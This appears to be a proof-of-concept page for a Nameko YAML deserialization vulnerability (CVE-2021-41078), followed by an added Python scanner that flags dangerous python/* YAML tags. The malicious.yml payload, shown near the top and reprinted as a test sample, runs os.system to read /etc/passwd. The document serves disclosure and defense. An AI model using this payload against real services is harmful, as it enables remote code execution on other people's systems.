Nameko: arbitrary code execution due to YAML deserialization
Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.
- Build an image from the Dockerfile
docker build -t cve-2021-41078 .
- Run python main.py in a new container
docker run -it --rm cve-2021-41078
Output (contents of /etc/passwd):
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --
malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
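
An added example (not part of the original PoC or the Nameko project): a standard-library Python check that flags `python/*` YAML tags in a config file before it reaches a loader, including tags reached through a `%TAG` alias or `%xx` escapes. The function name `find_python_tags` and the `ALIASED` and `BENIGN` samples are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Namespace PyYAML uses for tags that construct arbitrary Python objects.
PY_PREFIX = "tag:yaml.org,2002:python/"

TAG_DIRECTIVE = re.compile(r"^%TAG\s+(![0-9A-Za-z-]*!|!)\s+(\S+)")
VERBATIM = re.compile(r"!<([^>\s]+)>")
SHORTHAND = re.compile(r"(?<![\w!])(![0-9A-Za-z-]*!|!)([^\s,\[\]{}!]+)")


def find_python_tags(text):
    """Return [(line_number, resolved_tag)] for every python/* tag in text.
    Conservative: a tag inside a quoted string is reported as well."""
    handles = {"!!": "tag:yaml.org,2002:", "!": "!"}  # YAML default handles
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # whole-line comment, cannot carry a live tag
        directive = TAG_DIRECTIVE.match(line)
        if directive:
            # %TAG can alias any handle to the python/ namespace
            handles[directive.group(1)] = directive.group(2)
            continue
        candidates = [m.group(1) for m in VERBATIM.finditer(line)]
        for m in SHORTHAND.finditer(line):
            prefix = handles.get(m.group(1))
            if prefix is not None:
                candidates.append(prefix + m.group(2))
        for tag in candidates:
            tag = unquote(tag)  # tag characters may be written as %xx escapes
            if tag.startswith(PY_PREFIX):
                hits.append((lineno, tag))
    return hits


# Constructed samples: the page's malicious.yml, a %TAG-aliased file, a benign config.
MALICIOUS = """!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
"""
ALIASED = "%TAG !p! tag:yaml.org,2002:python/\n---\nhandler: !p!name:print\n"
BENIGN = "AMQP_URI: 'pyamqp://guest:guest@localhost'\nmax_workers: !!int 10\n"

if __name__ == "__main__":
    for name, doc in [("malicious", MALICIOUS), ("aliased", ALIASED), ("benign", BENIGN)]:
        print(name, find_python_tags(doc))
```

PyYAML's `yaml.safe_load` rejects these tags at parse time; the check above is for reviewing config files in CI or during triage without loading them.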